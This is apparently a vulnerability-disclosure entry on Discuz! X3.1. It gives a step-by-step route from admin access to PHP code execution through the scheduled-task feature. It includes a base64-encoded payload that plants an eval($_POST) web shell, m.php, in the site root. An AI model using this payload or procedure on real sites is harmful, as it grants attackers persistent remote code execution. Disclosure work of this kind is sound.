### 简要描述:
路人甲报过的洞,只是发现了新的利用方法,随手写下
### 详细说明:
总的来说,就是利用计划任务来执行php代码的。实现过程如下:
测试版本:Discuz! X3.1 Release 20131122
1.全局 » 站点信息:网站第三方统计代码里面插入:<?php fputs(fopen('m.php',w),base64_decode("PD9waHAgQGV2YWwoJF9QT1NUW2NdKTs/Pg=="));?>
插入后,更新下缓存。
[<img src="https://images.seebug.org/upload/201312/112149420c25c6557c3dd6f9a957b2607eb221c4.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/112149420c25c6557c3dd6f9a957b2607eb221c4.jpg)
2. 门户 » HTML管理 » 设置:
设置 专题HTML存放目录:source/include/cron
[<img src="https://images.seebug.org/upload/201312/11215305c0beb3625ef86e86ba7f5ce73d879adf.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/11215305c0beb3625ef86e86ba7f5ce73d879adf.jpg)
3.门户 » 专题管理 » 列表 » 创建专题,新建一个专题:
专题标题,随便写,静态化名称:test ,附加内容 选上 站点尾部信息然后提交。
[<img src="https://images.seebug.org/upload/201312/1122045678cadf2309d4c204349a4e6a7faf1fb5.jpg" alt="5.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/1122045678cadf2309d4c204349a4e6a7faf1fb5.jpg)
4. 开启刚才创建的专题,然后生成:
[<img src="https://images.seebug.org/upload/201312/11215706e06b4a289ed149dcd311d8e582747236.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/11215706e06b4a289ed149dcd311d8e582747236.jpg)
5.工具 » 计划任务 » 新增: test ,然后提交。然后 编辑计划任务 - test,分钟:设置为:1 ,任务脚本:test.html , 然后 提交。
6.成功在根目录生成一句话 m.php
[<img src="https://images.seebug.org/upload/201312/11220703b81003942909195c742d7c777a89bc3a.jpg" alt="6.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/11220703b81003942909195c742d7c777a89bc3a.jpg)
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201312/11220713fc7a51d9f9b2d1babcfd2aaa728ce77f.jpg" alt="6.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/11220713fc7a51d9f9b2d1babcfd2aaa728ce77f.jpg)
京公网安备 11010502034610号
暂无评论